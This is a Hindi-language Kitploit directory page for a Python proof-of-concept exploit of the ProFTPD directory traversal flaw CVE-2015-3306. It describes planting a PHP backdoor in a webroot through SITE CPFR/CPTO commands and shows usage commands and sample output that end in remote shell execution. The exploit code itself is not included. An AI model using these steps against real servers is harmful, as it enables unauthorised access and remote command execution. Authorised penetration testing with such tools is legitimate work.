Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2015-3306 — Python PoC शोषण CVE-2015-3306 ProFTPD निर्देशिका ट्रैवर्सल के लिए। फाइलों की प्रतिलिपि बनाता है और SITE CPFR/CPTO FTP कमांड के माध्यम से दूरस्थ कमांड निष्पादन के लिए वेबरूट में PHP बैकडोर ड्रॉप करता है। | Kitploit
उपकरण/GitHubGitHub/donmedfor/cve-2015-3306
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Python PoC शोषण CVE-2015-3306 ProFTPD निर्देशिका ट्रैवर्सल के लिए। फाइलों की प्रतिलिपि बनाता है और SITE CPFR/CPTO FTP कमांड के माध्यम से दूरस्थ कमांड निष्पादन के लिए वेबरूट में PHP बैकडोर ड्रॉप करता है।

रिपॉजिटरी देखें
0 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2015-3306 ProFTPD शोषण

यह रिपॉजिटरी में CVE-2015-3306 के लिए एक Python प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है।

⚠️ चेतावनी: इसका उपयोग केवल उन सिस्टम्स पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। अनधिकृत शोषण अवैध है।


लेखक

Mohamed EL-KHAROUATI


भाग 1: CVE-2015-3306 ProFTPD शोषण

विवरण

CVE-2015-3306 ProFTPD 1.3.5b और उससे पहले के संस्करणों में एक डायरेक्टरी ट्रैवर्सल कमजोरी है। यह शोषण मनमाने फ़ाइलों की प्रतिलिपि बनाने और वेबरूट में एक PHP बैकडोर डालने की अनुमति देता है। बैकडोर मनमाने शेल कमांड्स को निष्पादित कर सकता है।

विशेषताएँ

  • SITE CPFR/CPTO FTP कमांड्स के माध्यम से डायरेक्टरी ट्रैवर्सल कमजोरी का शोषण करता है।
  • निर्दिष्ट वेबरूट में एक PHP बैकडोर (backdoor.php) डालता है।
  • बैकडोर के माध्यम से मनमाने शेल कमांड्स को निष्पादित करता है।
  • --rcommand के माध्यम से कस्टम कमांड्स का समर्थन करता है।

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी (pip install requests)

उपयोग, आउटपुट और सफाई (एकल कोड ब्लॉक)

root@kitploit:~
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
टूल डाउनलोड करें